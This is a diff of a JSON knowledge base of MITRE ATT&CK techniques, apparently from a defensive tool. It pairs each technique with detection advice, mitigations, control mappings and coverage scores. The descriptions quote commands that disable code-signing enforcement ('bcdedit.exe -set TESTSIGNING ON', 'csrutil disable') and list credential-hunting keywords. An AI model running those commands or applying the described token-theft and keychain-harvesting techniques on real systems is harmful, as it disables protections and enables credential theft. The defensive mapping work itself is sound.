-        "detection": "Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.\n\nUse process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.",
+        "detection": "A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl.(Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List.(Citation: Microsoft Sigcheck May 2017)\n\nInstalled root certificates are located in the Registry under HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\ and [HKLM or HKCU]\\Software[\\Policies\\]\\Microsoft\\SystemCertificates\\Root\\Certificates\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison:(Citation: Tripwire AppUNBlocker)\n\n* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\n* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\n* 3B1EFD3A66EA28B16697394703A72CA340A05BD5\n* 7F88CD7223F3C813818C994614A89C99FA3B5247\n* 8F43288AD272F3103B6FB1428485EA3014C0BCFE\n* A43489159A520F0D93D032CCAF37E7FE20A8B419\n* BE36A4562FB2EE05DBB3D32323ADF445084ED656\n* CDD4EEAE6000AC7F40C3802C171E30148030C072",
         "platforms": [
-            "Windows"
+            "Linux",
+            "Windows",
+            "macOS"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "Process: Process Creation"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1127.001",
-                "name": "Trusted Developer Utilities Proxy Execution: MSBuild",
-                "url": "https://attack.mitre.org/techniques/T1127/001",
-                "description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)\n\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)",
-                "detection": "Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.",
-                "mitigations": [
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    }
-                ]
-            }
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Creation",
+            "Windows Registry: Windows Registry Key Modification"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1553",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1042",
-                "name": "Disable or Remove Feature or Program",
-                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                "url": "https://attack.mitre.org/mitigations/M1042"
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
             },
             {
-                "mid": "M1038",
-                "name": "Execution Prevention",
-                "description": "Block execution of code on a system through application control, and/or script blocking.",
-                "url": "https://attack.mitre.org/mitigations/M1038"
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
             }
         ],
-        "cumulative_score": 0.4504828442857143,
-        "adjusted_score": 0.4504828442857143,
+        "cumulative_score": 0.20952380952380953,
+        "adjusted_score": 0.20952380952380953,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "2.3",
-            "2.5",
-            "2.7",
             "4.1",
             "4.8",
             "18.3",
-            "18.5",
-            "16.10"
+            "18.5"
         ],
         "nist_controls": [
-            "CM-2",
+            "CM-10",
             "CM-6",
             "CM-7",
-            "CM-8",
-            "RA-5",
-            "SI-10",
-            "SI-4",
-            "SI-7"
+            "IA-9",
+            "SC-20",
+            "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.3142857142857143,
-            "mitigation_score": 0.2909090909090909,
-            "detection_score": 0.34
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.03619713
+        "hardware_coverage": false
     },
     {
-        "tid": "T1129",
-        "name": "Shared Modules",
-        "description": "Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)\n\nThe module loader can load DLLs:\n\n* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;\n    \n* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);\n    \n* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;\n    \n* via <file name=\"filename.extension\" loadFrom=\"fully-qualified or relative pathname\"> in an embedded or external \"application manifest\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\n\nAdversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features.",
-        "url": "https://attack.mitre.org/techniques/T1129",
+        "tid": "T1553.005",
+        "name": "Subvert Trust Controls: Mark-of-the-Web Bypass",
+        "description": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)\n\nAdversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)",
+        "url": "https://attack.mitre.org/techniques/T1553/005",
         "tactics": [
-            "Execution"
+            "Defense Evasion"
         ],
-        "detection": "Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to %SystemRoot% and %ProgramFiles% directories will protect against module loads from unsafe paths. \n\nCorrelation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.",
+        "detection": "Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.",
         "platforms": [
             "Windows"
         ],
         "data_sources": [
-            "Module: Module Load",
-            "Process: OS API Execution"
+            "File: File Creation",
+            "File: File Metadata"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1553",
         "subtechniques": [],
         "mitigations": [
             {
@@ -6956,1078 +30077,823 @@
                 "url": "https://attack.mitre.org/mitigations/M1038"
             }
         ],
-        "cumulative_score": 0.17172472142857143,
-        "adjusted_score": 0.17172472142857143,
+        "cumulative_score": 0.1,
+        "adjusted_score": 0.1,
         "has_car": false,
         "has_sigma": false,
-        "has_es_siem": true,
+        "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [
-            "2.5",
-            "2.6"
-        ],
+        "cis_controls": [],
         "nist_controls": [
             "CM-2",
+            "CM-6",
             "CM-7",
             "SI-10",
             "SI-4",
             "SI-7"
         ],
-        "process_coverage": true,
+        "process_coverage": false,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.07142857142857142,
-            "mitigation_score": 0.12727272727272726,
-            "detection_score": 0.01
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00029615
+        "hardware_coverage": false
     },
     {
-        "tid": "T1132",
-        "name": "Data Encoding",
-        "description": "Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.",
-        "url": "https://attack.mitre.org/techniques/T1132",
+        "tid": "T1553.006",
+        "name": "Subvert Trust Controls: Code Signing Policy Modification",
+        "description": "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. \n\nSome of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)\n\nAdversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows and csrutil disable on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)\n\nTo gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)",
+        "url": "https://attack.mitre.org/techniques/T1553/006",
         "tactics": [
-            "Command And Control"
+            "Defense Evasion"
         ],
-        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+        "detection": "Monitor processes and command-line arguments for actions that could be taken to modify the code signing policy of a system, such as bcdedit.exe -set TESTSIGNING ON.(Citation: Microsoft TESTSIGNING Feb 2021) Consider monitoring for modifications made to Registry keys associated with code signing policies, such as HKCU\\Software\\Policies\\Microsoft\\Windows NT\\Driver Signing. Modifications to the code signing policy of a system are likely to be rare.",
         "platforms": [
-            "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Network Traffic: Network Traffic Content"
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
+        "is_subtechnique": true,
+        "supertechnique": "T1553",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1132.001",
-                "name": "Data Encoding: Standard Encoding",
-                "url": "https://attack.mitre.org/techniques/T1132/001",
-                "description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.",
-                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
-                "mitigations": [
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    }
-                ]
+                "mid": "M1046",
+                "name": "Boot Integrity",
+                "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                "url": "https://attack.mitre.org/mitigations/M1046"
             },
             {
-                "tid": "T1132.002",
-                "name": "Data Encoding: Non-Standard Encoding",
-                "url": "https://attack.mitre.org/techniques/T1132/002",
-                "description": "Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) ",
-                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
-                "mitigations": [
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    }
-                ]
-            }
-        ],
-        "mitigations": [
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
             {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
+                "mid": "M1024",
+                "name": "Restrict Registry Permissions",
+                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                "url": "https://attack.mitre.org/mitigations/M1024"
             }
         ],
-        "cumulative_score": 0.2605191957142857,
-        "adjusted_score": 0.2605191957142857,
+        "cumulative_score": 0.13333333333333333,
+        "adjusted_score": 0.13333333333333333,
         "has_car": false,
-        "has_sigma": false,
-        "has_es_siem": false,
-        "has_splunk": false,
-        "cis_controls": [
-            "13.3",
-            "13.8"
-        ],
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
         "nist_controls": [
-            "AC-4",
-            "CA-7",
-            "CM-2",
-            "CM-6",
-            "SC-7",
-            "SI-3",
-            "SI-4"
+            "AC-6",
+            "CA-8",
+            "CM-3",
+            "CM-5",
+            "CM-7",
+            "CM-8",
+            "IA-7",
+            "RA-9",
+            "SA-10",
+            "SA-11",
+            "SC-34",
+            "SI-2",
+            "SI-7"
         ],
-        "process_coverage": false,
-        "network_coverage": true,
-        "file_coverage": false,
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.08571428571428572,
-            "mitigation_score": 0.16363636363636364
-        },
-        "choke_point_score": 0.15000000000000002,
-        "prevalence_score": 0.02480491
+        "hardware_coverage": false
     },
     {
-        "tid": "T1133",
-        "name": "External Remote Services",
-        "description": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)\n\nAccess to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.\n\nAccess may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)",
-        "url": "https://attack.mitre.org/techniques/T1133",
+        "tid": "T1554",
+        "name": "Compromise Client Software Binary",
+        "description": "Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.\n\nAdversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.",
+        "url": "https://attack.mitre.org/techniques/T1554",
         "tactics": [
-            "Initial Access",
             "Persistence"
         ],
-        "detection": "Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.\n\nWhen authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application.",
+        "detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. \n\nConsider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.",
         "platforms": [
-            "Containers",
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
-            "Logon Session: Logon Session Metadata",
-            "Network Traffic: Network Traffic Flow"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [],
-        "mitigations": [
-            {
-                "mid": "M1042",
-                "name": "Disable or Remove Feature or Program",
-                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                "url": "https://attack.mitre.org/mitigations/M1042"
-            },
-            {
-                "mid": "M1035",
-                "name": "Limit Access to Resource Over Network",
-                "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
-                "url": "https://attack.mitre.org/mitigations/M1035"
-            },
-            {
-                "mid": "M1032",
-                "name": "Multi-factor Authentication",
-                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                "url": "https://attack.mitre.org/mitigations/M1032"
-            },
-            {
-                "mid": "M1030",
-                "name": "Network Segmentation",
-                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                "url": "https://attack.mitre.org/mitigations/M1030"
-            }
+            "File: File Creation",
+            "File: File Deletion",
+            "File: File Metadata",
+            "File: File Modification"
         ],
-        "cumulative_score": 0.5285714285714286,
-        "adjusted_score": 0.5285714285714286,
-        "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": false,
-        "cis_controls": [
-            "2.3",
-            "2.5",
-            "3.12",
-            "4.1",
-            "4.2",
-            "4.4",
-            "4.8",
-            "6.3",
-            "6.4",
-            "6.5",
-            "7.6",
-            "7.7",
-            "12.2",
-            "12.7",
-            "12.8",
-            "13.5",
-            "16.8",
-            "18.3",
-            "18.5",
-            "13.10",
-            "16.10"
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            }
+        ],
+        "cumulative_score": 0.2857142857142857,
+        "adjusted_score": 0.2857142857142857,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.7",
+            "4.1"
         ],
         "nist_controls": [
-            "AC-17",
-            "AC-20",
-            "AC-23",
-            "AC-3",
-            "AC-4",
-            "AC-6",
-            "AC-7",
+            "CA-8",
             "CM-2",
             "CM-6",
-            "CM-7",
-            "CM-8",
-            "IA-2",
-            "IA-5",
-            "RA-5",
-            "SC-46",
-            "SC-7",
-            "SI-4",
-            "SI-7"
+            "IA-9",
+            "SI-7",
+            "SR-11",
+            "SR-4",
+            "SR-5",
+            "SR-6"
         ],
         "process_coverage": false,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.4285714285714286,
-            "mitigation_score": 0.7090909090909091,
-            "detection_score": 0.12
+            "combined_score": 0.18571428571428572,
+            "mitigation_score": 0.2,
+            "detection_score": 0.17
         },
         "choke_point_score": 0.1,
         "prevalence_score": 0
     },
     {
-        "tid": "T1134",
-        "name": "Access Token Manipulation",
-        "description": "Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.\n\nAn adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)\n\nAny standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.",
-        "url": "https://attack.mitre.org/techniques/T1134",
+        "tid": "T1555",
+        "name": "Credentials from Password Stores",
+        "description": "Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.",
+        "url": "https://attack.mitre.org/techniques/T1555",
         "tactics": [
-            "Defense Evasion",
-            "Privilege Escalation"
+            "Credential Access"
         ],
-        "detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. \n\nThere are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., LogonUser (Citation: Microsoft LogonUser), DuplicateTokenEx(Citation: Microsoft DuplicateTokenEx), and ImpersonateLoggedOnUser(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.\n\nQuery systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)\n\nLook for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.",
+        "detection": "Monitor system calls, file read events, and processes for suspicious activity that could indicate searching for a password  or other activity related to performing keyword searches (e.g. password, pwd, login, store, secure, credentials, etc.) in process memory for credentials. File read events should be monitored surrounding known password storage applications.",
         "platforms": [
-            "Windows"
+            "Linux",
+            "Windows",
+            "macOS"
         ],
         "data_sources": [
-            "Active Directory: Active Directory Object Modification",
             "Command: Command Execution",
+            "File: File Access",
             "Process: OS API Execution",
-            "Process: Process Creation",
-            "Process: Process Metadata",
-            "User Account: User Account Metadata"
+            "Process: Process Access",
+            "Process: Process Creation"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1134.001",
-                "name": "Access Token Manipulation: Token Impersonation/Theft",
-                "url": "https://attack.mitre.org/techniques/T1134/001",
-                "description": "Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.\n\nAn adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.",
-                "detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nAnalysts can also monitor for use of Windows APIs such as DuplicateToken(Ex),  ImpersonateLoggedOnUser , and  SetThreadToken  and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
+                "tid": "T1555.001",
+                "name": "Credentials from Password Stores: Keychain",
+                "url": "https://attack.mitre.org/techniques/T1555/001",
+                "description": "Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.\n\nTo manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.",
+                "detection": "Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.",
                 "mitigations": [
                     {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
                     }
                 ]
             },
             {
-                "tid": "T1134.002",
-                "name": "Access Token Manipulation: Create Process with Token",
-                "url": "https://attack.mitre.org/techniques/T1134/002",
-                "description": "Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs)\n\nCreating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)).",
